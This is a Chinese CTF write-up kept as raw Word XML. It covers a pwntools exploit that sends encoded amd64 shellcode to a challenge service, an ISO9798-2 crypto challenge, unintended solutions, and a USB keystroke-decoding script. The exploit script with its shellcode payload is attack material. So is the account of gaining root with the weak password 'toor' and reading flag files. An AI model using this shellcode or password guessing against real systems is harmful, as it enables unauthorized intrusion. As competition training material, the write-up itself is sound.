            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">context(arch = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'amd64'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, os = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'linux'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, log_level = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'debug'</w:t>
            </w:r>
            <w:r>
              <w:t>)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rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t># attach(p,'b *$rebase(0x0000000000000EC9)')</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">payload1 = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"opt:1\nmsg:ro0t1\n\n"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shellcode_64=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a071N00"</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>payload=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"opt:2\nmsg:"</w:t>
            </w:r>
            <w:r>
              <w:t>+shellcode_64+</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"\n\n"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p.recvuntil(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>'&gt;&gt;&gt; '</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>p.send(payload1)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>pause()</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>p.recvuntil(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
              </w:rPr>
              <w:t>"&gt;&gt;&gt; "</w:t>
            </w:r>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>p.send(payload)</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>​</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>pause()</w:t>
            </w:r>
            <w:r>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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ps: 注意汇编要求的是rdx，所以生成的时候使用rdx。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flag{545e482b-5092-42cc-bedb-5ba75c958670}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06</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ISO9798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ISO9798-2查询网上的中文资料非常少，绝大部分是英文，根本看不懂，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不过查了很多，得到了几点信息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三重加密认证的标准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对称分组加密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10896600" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="51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对称分组加密的特点就是以64位一组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然后判断密文的位数是96位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三个自然猜测每个都是32位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可以得到下列式子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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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Encry(A+B+C) = Encry(A)+Encry(B)+Encry(C)</w:t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br w:type="textWrapping"/>
      </w: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​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要返回B和A的加密结果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3933825" cy="247650"/>
            <wp:effectExtent l="0" t="0" r="13335" b="11430"/>
            <wp:docPr id="54" name="图片 5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直接从之前的密文进行截取就可以了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8972550" cy="1000125"/>
            <wp:effectExtent l="0" t="0" r="3810" b="5715"/>
            <wp:docPr id="52" name="图片 5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输入得到flag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8937625" cy="569595"/>
            <wp:effectExtent l="0" t="0" r="8255" b="9525"/>
            <wp:docPr id="53" name="图片 5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IMG_2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3762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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 基于挑战码的双向认证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和2一起的非预期，进去看了很多人解，猜测有非预期，搜了一下flag，找到了位置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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/root/cube-shell/instance/flag_server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="宋体" w:cs="JetBrains Mono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JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="宋体" w:cs="JetBrains Mono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然后cat即可</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="宋体" w:cs="JetBrains Mono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cat /root/cube-shell/instance/flag_server/flag1.txt flag2.txt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07</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 基于挑战码的双向认证2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r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cat /root/cube-shell/instance/flag_server/flag1.txt flag2.txt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10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于挑战码的双向认证</w:t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也是非预期，本来是想着，这个是1的原题，弥补非预期的，然后ssh上去看了下内核4.xx版本，尝试了dirty pipe，失败，然后另一名队友直接su密码爆出来了，，，，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密码 toor弱口令，同样的位置拿到了flag。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以上三个flag非预期都被修复，没能存下flag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ez_usb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这个题也是经典了，刚开始忽略了一点东西，导致做的慢了一点。usb键盘流量和鼠标流量基本都是tshark一把梭。所以一开始我也直接梭。。。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然后得到一个密文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2B2B"/>
        <w:ind w:left="24" w:right="24" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="A9B7C6"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:shd w:val="clear" w:fill="2B2B2B"/>
        </w:rPr>
        <w:t>526172211a0700Cf907300000d00000000000000c4527424943500300000002A0000000235b9f9b0530778b5541d3308c50020000000666c61672E747874B9Ba0132357642f3aFC000b092c229d6e994167c055eA78708b271fFC042ae3d251e65536F9Ada5087c77406b67d0E631668476607a86e844dC81AA2c72c714a348d10c43D7B00400700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搜了一下头部，发现是rar，然后一直压缩文件格式损坏，出不了，就去修压缩包去了。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后来观察了一下流量包。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5175885" cy="2430780"/>
            <wp:effectExtent l="0" t="0" r="5715" b="7620"/>
            <wp:docPr id="57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发现不同的ip，不同的ip属于不同的流量，这人还用了几个键盘。。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过滤之后分开各种数据包。</w:t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19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="auto" w:sz="12" w:space="0"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2771775" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="56" name="图片 5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 descr="IMG_25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然后分别提取，得到正确的压缩包和密码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694805" cy="1497965"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10795"/>
            <wp:docPr id="55" name="图片 5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  <w:p>
            <w:r>
              <w:t>n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>ormalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"&lt;RET&gt;","29":"&lt;ESC&gt;","2a":"&lt;DEL&gt;", "2b":"\t","2c":"&lt;SPACE&gt;","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"&lt;NON&gt;","33":";","34":"'","35":"&lt;GA&gt;","36":",","37":".","38":"/","39":"&lt;CAP&gt;","3a":"&lt;F1&gt;","3b":"&lt;F2&gt;", "3c":"&lt;F3&gt;","3d":"&lt;F4&gt;","3e":"&lt;F5&gt;","3f":"&lt;F6&gt;","40":"&lt;F7&gt;","41":"&lt;F8&gt;","42":"&lt;F9&gt;","43":"&lt;F10&gt;","44":"&lt;F11&gt;","45":"&lt;F12&gt;"}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shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&amp;","25":"*","26":"(","27":")","28":"&lt;RET&gt;","29":"&lt;ESC&gt;","2a":"&lt;DEL&gt;", "2b":"\t","2c":"&lt;SPACE&gt;","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"&lt;NON&gt;","33":"\"","34":":","35":"&lt;GA&gt;","36":"&lt;","37":"&gt;","38":"?","39":"&lt;CAP&gt;","3a":"&lt;F1&gt;","3b":"&lt;F2&gt;", "3c":"&lt;F3&gt;","3d":"&lt;F4&gt;","3e":"&lt;F5&gt;","3f":"&lt;F6&gt;","40":"&lt;F7&gt;","41":"&lt;F8&gt;","42":"&lt;F9&gt;","43":"&lt;F10&gt;","44":"&lt;F11&gt;","45":"&lt;F12&gt;"}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output = []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keys = open('out10.txt','r')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for line in keys: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try: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if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":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 continue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if line[6:8] in normalKeys.keys():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output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']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else: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output += ['[unknown]']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except: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pass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keys.close()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​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flag=0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print("".join(output))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for i in range(len(output)):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try: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a=output.index('&lt;DEL&gt;')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del output[a]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del output[a-1]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except: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pass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for i in range(len(output)):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try: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if output[i]=="&lt;CAP&gt;":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flag+=1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output.pop(i)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if flag==2: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    flag=0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if flag!=0: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    output[i]=output[i].upper()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except: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       pass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print ('output :' + "".join(output))</w:t>
            </w:r>
          </w:p>
          <w:p/>
          <w:p/>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="9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JetBrains Mono" w:hAnsi="JetBrains Mono" w:eastAsia="JetBrains Mono" w:cs="JetBrains Mono"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>csdn的脚本，一把梭。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flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>04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问卷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JetBrains Mono">
    <w:panose1 w:val="02000009000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="A00402FF" w:usb1="1200F9FB" w:usb2="02000028" w:usb3="00000000" w:csb0="2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nitial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3"/>
      </w:rPr>
      <w:id w:val="726261543"/>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:rStyle w:val="13"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p>
        <w:pPr>
          <w:pStyle w:val="6"/>
          <w:framePr w:wrap="around" w:vAnchor="text" w:hAnchor="margin" w:xAlign="center" w:y="1"/>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rPr>
        </w:pPr>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGE </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="13"/>
          </w:rP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left"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="114300" distR="114300">
          <wp:extent cx="595630" cy="351155"/>
          <wp:effectExtent l="0" t="0" r="0" b="11430"/>
          <wp:docPr id="5" name="图片 5" descr="06441c361a1dd2e0917b79fe37beed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06441c361a1dd2e0917b79fe37beed3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5630" cy="3511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212923"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07212923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M3MjM1ZjkxZWI4M2Y3ZWNiNTQxNmNhMDYzZmI0YjUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00471449"/>
    <w:rsid w:val="000F40E1"/>
    <w:rsid w:val="00211D5D"/>
    <w:rsid w:val="00212C6F"/>
    <w:rsid w:val="00224A40"/>
    <w:rsid w:val="0025221E"/>
    <w:rsid w:val="0025561B"/>
    <w:rsid w:val="00257F54"/>
    <w:rsid w:val="002927E1"/>
    <w:rsid w:val="002E556A"/>
    <w:rsid w:val="00323C7D"/>
    <w:rsid w:val="00386B4C"/>
    <w:rsid w:val="003A2061"/>
    <w:rsid w:val="003C4B25"/>
    <w:rsid w:val="00421365"/>
    <w:rsid w:val="00471449"/>
    <w:rsid w:val="004A1A8C"/>
    <w:rsid w:val="005173F3"/>
    <w:rsid w:val="00585C60"/>
    <w:rsid w:val="005E3255"/>
    <w:rsid w:val="00612123"/>
    <w:rsid w:val="0061693F"/>
    <w:rsid w:val="00662F00"/>
    <w:rsid w:val="006B5BDF"/>
    <w:rsid w:val="006C0160"/>
    <w:rsid w:val="006E18B9"/>
    <w:rsid w:val="00725332"/>
    <w:rsid w:val="007565DF"/>
    <w:rsid w:val="007A0FD7"/>
    <w:rsid w:val="007D0D5A"/>
    <w:rsid w:val="007D123C"/>
    <w:rsid w:val="007E6048"/>
    <w:rsid w:val="00815834"/>
    <w:rsid w:val="0082616F"/>
    <w:rsid w:val="008518E8"/>
    <w:rsid w:val="008766D9"/>
    <w:rsid w:val="008B1B4C"/>
    <w:rsid w:val="00904F58"/>
    <w:rsid w:val="009A468C"/>
    <w:rsid w:val="00A646DA"/>
    <w:rsid w:val="00AF0CC0"/>
    <w:rsid w:val="00B23BE2"/>
    <w:rsid w:val="00B36721"/>
    <w:rsid w:val="00B9158C"/>
    <w:rsid w:val="00BA1D36"/>
    <w:rsid w:val="00BD7E71"/>
    <w:rsid w:val="00BE17A1"/>
    <w:rsid w:val="00C67DA3"/>
    <w:rsid w:val="00D50FFF"/>
    <w:rsid w:val="00D970AA"/>
    <w:rsid w:val="00DA79E4"/>
    <w:rsid w:val="00E11284"/>
    <w:rsid w:val="00E13DBE"/>
    <w:rsid w:val="00EA7267"/>
    <w:rsid w:val="00F92565"/>
    <w:rsid w:val="06813A9B"/>
    <w:rsid w:val="0778396E"/>
    <w:rsid w:val="07B66844"/>
    <w:rsid w:val="07FD5A18"/>
    <w:rsid w:val="0AED4AEE"/>
    <w:rsid w:val="11EC3839"/>
    <w:rsid w:val="13394725"/>
    <w:rsid w:val="13C5122C"/>
    <w:rsid w:val="13FF393E"/>
    <w:rsid w:val="14EC79D9"/>
    <w:rsid w:val="1571483C"/>
    <w:rsid w:val="17070B97"/>
    <w:rsid w:val="18CF32CC"/>
    <w:rsid w:val="1A437069"/>
    <w:rsid w:val="1AEB42AB"/>
    <w:rsid w:val="233E2B91"/>
    <w:rsid w:val="23A3223B"/>
    <w:rsid w:val="2EF53AA9"/>
    <w:rsid w:val="30FC0C40"/>
    <w:rsid w:val="317C6490"/>
    <w:rsid w:val="327821D2"/>
    <w:rsid w:val="33211BC4"/>
    <w:rsid w:val="338B47FE"/>
    <w:rsid w:val="35621829"/>
    <w:rsid w:val="357C3328"/>
    <w:rsid w:val="35F52FBE"/>
    <w:rsid w:val="37C82A9F"/>
    <w:rsid w:val="3CAF3EBE"/>
    <w:rsid w:val="3E230D79"/>
    <w:rsid w:val="3EDBFC32"/>
    <w:rsid w:val="417F29E5"/>
    <w:rsid w:val="49827A52"/>
    <w:rsid w:val="498A016B"/>
    <w:rsid w:val="4A690B00"/>
    <w:rsid w:val="4A981C28"/>
    <w:rsid w:val="4C96305D"/>
    <w:rsid w:val="4CFBE6DF"/>
    <w:rsid w:val="4D24430E"/>
    <w:rsid w:val="4D304E49"/>
    <w:rsid w:val="4E214614"/>
    <w:rsid w:val="513836D2"/>
    <w:rsid w:val="529A1D15"/>
    <w:rsid w:val="54260D80"/>
    <w:rsid w:val="56FF27C8"/>
    <w:rsid w:val="57472E3B"/>
    <w:rsid w:val="580E3830"/>
    <w:rsid w:val="59944C17"/>
    <w:rsid w:val="5AF73FD1"/>
    <w:rsid w:val="5B4274AE"/>
    <w:rsid w:val="5B81411E"/>
    <w:rsid w:val="5C442424"/>
    <w:rsid w:val="5D613B65"/>
    <w:rsid w:val="5E7F5275"/>
    <w:rsid w:val="62025656"/>
    <w:rsid w:val="62734727"/>
    <w:rsid w:val="629667EE"/>
    <w:rsid w:val="62B95D29"/>
    <w:rsid w:val="659A63C7"/>
    <w:rsid w:val="6C060203"/>
    <w:rsid w:val="6C247A6E"/>
    <w:rsid w:val="6DAC1552"/>
    <w:rsid w:val="6FBE2DB4"/>
    <w:rsid w:val="7A902B1B"/>
    <w:rsid w:val="7B002F5C"/>
    <w:rsid w:val="7F9948B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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:styleId="14">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="12"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="15">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="12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页眉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7">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="6"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="12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9">
    <w:name w:val="文档结构图 字符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2486</Words>
  <Characters>8710</Characters>
  <Lines>8</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>14</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>9859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2021-05-26T06:48:00Z</dcterms:created>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>16385</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-29T11:27:00Z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1D742A9E2E3E46F8AB65AFAEDC4BF138</vt:lpwstr>
  </property>
</Properties>
</file>